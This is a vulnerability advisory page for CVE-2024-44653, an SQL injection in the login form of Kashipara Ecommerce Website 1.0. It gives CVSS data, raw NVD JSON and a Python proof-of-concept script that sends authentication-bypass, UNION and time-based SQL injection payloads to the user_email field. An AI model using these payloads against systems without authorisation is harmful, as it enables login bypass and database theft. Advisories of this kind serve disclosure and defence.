Security Vulnerability Report
中文
CVE-2024-44653 CVSS 6.5 MEDIUM

CVE-2024-44653

Published: 2025-11-17 18:15:56
Last Modified: 2025-11-19 13:09:29

Description

Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email parameter in user_login.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE
Kashipara Ecommerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44653 SQL Injection PoC # Target: Kashipara Ecommerce Website 1.0 # Endpoint: user_login.php # Parameter: user_email def test_sql_injection(target_url): print(f"[*] Testing CVE-2024-44653 SQL Injection on {target_url}") # Test basic SQL injection - authentication bypass payloads = [ "' OR '1'='1", "admin' OR '1'='1'--", "' UNION SELECT NULL,NULL,NULL--", "' AND SLEEP(5)--" ] for payload in payloads: data = { 'user_email': payload, 'user_pass': 'test', 'login': 'submit' } try: response = requests.post(target_url, data=data, timeout=10) print(f"[+] Payload: {payload}") print(f" Status: {response.status_code}") print(f" Length: {len(response.text)}") # Check for SQL error indicators if 'sql' in response.text.lower() or 'mysql' in response.text.lower(): print(f" [!] Potential SQL error detected!") print() except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target.com/user_login.php" test_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44653", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:55.577", "lastModified": "2025-11-19T13:09:29.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email parameter in user_login.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8310BCC9-1851-4B2A-9894-B774274C867C"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44653.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download", "source": "[email protected]", "tags": ["Product"]}]}}